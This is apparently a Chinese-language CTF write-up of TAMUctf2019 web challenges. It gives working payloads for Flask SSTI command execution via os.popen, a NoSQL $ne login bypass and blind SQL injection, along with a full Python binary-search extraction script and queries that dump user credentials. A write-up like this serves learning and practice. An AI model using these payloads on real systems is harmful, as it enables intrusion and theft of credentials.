k0t0r1

TAMUctf2019 web wp
3月初的一个比赛,最近才复现做完 TAMUctf2019
扫描右侧二维码阅读全文
31
2019/03

TAMUctf2019 web wp

  1.  首页
  2. 正文  
    3. 分享到:

3月初的一个比赛,最近才复现做完
TAMUctf2019

Not Another SQLi Challenge

很简单,万能密码过

Robots Rule

打开robots.txt,提示

WHAT IS UP, MY FELLOW HUMAN!
HAVE YOU RECEIVED SECRET INFORMATION ON THE DASTARDLY GOOGLE ROBOTS?!
YOU CAN TELL ME, A FELLOW NOT-A-ROBOT!

于是把user-agent改为googlebot即可

Science!

进入提示Flask框架那应该就是SSTI了
然后尝试{{1+1}}发现上下两个输入框的结果都为2,于是开始搞事

然而正常操作好像不行orz
于是用另一种操作

payload:

{{url_for.__globals__.os.__dict__.popen('ls').read()}}
{{url_for.__globals__.os.__dict__.popen('cat flag.txt').read()}}

这里url_for是flask框架的一个函数,简单来说就是该函数的内核中有os模块,于是再通过__dict__去使用os模块中的popen()函数

Many Gig'ems to you!

打开后有cookies就抓个包,发现

于是猜测gigem_continue是flag的一段,然后F12查看网站的源码看看

于是把这两段连起来提交然而不对
但提示flag in cookies那就打开cookies这个页面的链接
然后F12继续在源码中寻找,发现

于是把source_and_接上得到flag

LoginApp

这题比赛时没搞出来,结束后看wp才知道是一道基础的nosql注入

在复现做的时候迷之burpsuite抓不到包,于是只能手动弄http报文
F12可以看到用了ajax,将输入的username和password打包成json,以post方式发向login

$("#submit").on('click', function(){
    $.ajax({
        url: 'login', 
        type : "POST", 
        dataType : 'json', 
        data : JSON.stringify({"username": $("#username").val(), "password": $("#password").val()}),
        contentType: 'application/json;charset=UTF-8',
        success : function(result) {
            $(".result").html(result);
            console.log(result);
            alert(result);
        },
        error: function(xhr, resp, text) {
            $(".result").html("Something went wrong"); 
            console.log(xhr, resp, text);
        }
    })
});

于是就写一段js生成要post的json字符串

<script type="text/javascript">
    alert(JSON.stringify({"username": "admin", "password": {"$ne":1}}));
</script>

修改一下content-type,发包得到flag

payload:
{"username":"admin","password":{"$ne":"1"}}

BirdBox

这题比赛时就觉得是一道盲注,比较正确和错误时是很明显的两个页面

然后就上python脚本
然而只能跑出注释里给出的值,而且列,表和库都只有一个
看了wp才知道是放在user里,以后还是要仔细点做orz

# -*- coding:utf8 -*-  
import requests
import time
import re

url = r'http://localhost/Website/Search.php?Search='

for i in range(1):

    l1 = 0
    r1 = 100

    while(l1<=r1):
        mid1 = (l1 + r1)/2    
        payload = "1'^((select length(user()))="+str(mid1)+")^'"
        new_url = url + payload
        print new_url
        try:
            http = requests.get(new_url,timeout=5)
        except requests.exceptions.Timeout:
            for p in range(1, 10):
                print "p"+str(p)
                try:
                    http = requests.get(new_url,timeout=5)
                    time.sleep(5)
                except requests.exceptions.Timeout:
                            pass
                if http.content:
                            break
        time.sleep(1)
        if re.findall(r"<h1>(.*)</h1>",http.content)[0] == 'Nice try, nothing to see here.' :
            break
        else:
            payload = "1'^((select length(user()))<"+str(mid1)+")^'"
            new_url = url + payload
            print new_url
            try:
                http = requests.get(new_url,timeout=5)
            except requests.exceptions.Timeout:
                for p in range(1, 10):
                    print "p"+str(p)
                    try:
                        http = requests.get(new_url,timeout=5)
                        time.sleep(5)
                    except requests.exceptions.Timeout:
                                pass
                    if http.content:
                                break
            time.sleep(1)
            if re.findall(r"<h1>(.*)</h1>",http.content)[0] == 'Nice try, nothing to see here.' :
                r1 = mid1 - 1
            else:
                l1 = mid1 + 1

    if mid1==0:
        break
    print 
    print str(i)+":"+str(mid1)
    k = ''



    for j in range(mid1):

        l2 = 0
        r2 = 128

        while(l2<=r2):
            mid2 = (l2 + r2)/2    
            payload = "1'^((select ascii(mid(user(),"+str(j+1)+",1)))="+str(mid2)+")^'"
            new_url = url + payload
            print new_url
            try:
                http = requests.get(new_url,timeout=5)
            except requests.exceptions.Timeout:
                for p in range(1, 10):
                    print "p"+str(p)
                    try:
                        http = requests.get(new_url,timeout=5)
                        time.sleep(5)
                    except requests.exceptions.Timeout:
                                pass
                    if http.content:
                                break
            time.sleep(1)
            if re.findall(r"<h1>(.*)</h1>",http.content)[0] == 'Nice try, nothing to see here.' :
                q = mid2
                break
            else:
                payload = "1'^((select ascii(mid(user(),"+str(j+1)+",1)))<"+str(mid2)+")^'"
                new_url = url + payload
                print new_url
                try:
                    http = requests.get(new_url,timeout=5)
                except requests.exceptions.Timeout:
                    for p in range(1, 10):
                        print "p"+str(p)
                        try:
                            http = requests.get(new_url,timeout=5)
                            time.sleep(5)
                        except requests.exceptions.Timeout:
                                    pass
                        if http.content:
                                    break
                time.sleep(1)
                if re.findall(r"<h1>(.*)</h1>",http.content)[0] == 'Nice try, nothing to see here.' :
                    r2 = mid2 - 1
                else:
                    l2 = mid2 + 1

        print 
        k = k+chr(q)
        print k

    print

payload:
1'^((select length(user()))=50)^'
1'^((select ascii(mid(user(),1,1)))=64)^'

l33tSecurity

和上题一样也是一道盲注题,比较坑的地方是跳转到message页面的那个按钮太小了,看了好久才找到这个页面orz

message页面一看url就觉得有注入点,也是很明显的盲注,同样上脚本

1' and ((select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=50) and '1
1' and ((select ascii(mid((group_concat(table_name)),1,1)) from information_schema.tables where table_schema=database())=64) and '1

跑出messages,users
然后接着查users表

1' and ((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=50) and '1
1' and ((select ascii(mid((group_concat(column_name)),1,1)) from information_schema.columns where table_name='users')=64) and '1

跑出UserID,Username,Password,FirstName,LastName,Phone,Email,Description,CreateDate,Secret
感觉UserID,Username,Password和Secret会有用,于是继续注入

1' and ((select length(group_concat(UserID,' ',Username,' ',Password,' ',Secret)) from users)=250) and '1
1' and ((select ascii(mid((group_concat(UserID,' ',Username,' ',Password,' ',Secret)),1,1)) from users)=64) and '1

拿到了所有用户的信息,最重要的还是admin的

1 1337-admin 02ca0b0603222a090fe2fbf3ba97d90c WIFHXDZ3BOHJMJSC

密码应该是md5加密过用不了,于是试着抓包看看,发现cookie里有id和secret

于是修改一下cookie再发送得到flag

Buckets

这题要注册一个亚马逊服务器,有点麻烦就没复现

这题参考这里
针对亚马逊云存储器S3 BUCKET的渗透测试

不是看得很懂,大概是在AmazonS3上,我们可以尝试用http://bucketname.s3.amazonaws.com这样的方式去探查不受访问权限限制的bucket,如果成功就会返回一个目录列表,然后就能各种搞事了

最后修改:2019 年 04 月 06 日 03 : 02 PM
© 著作权归作者所有
如果觉得我的文章对你有用,请随意赞赏

发表评论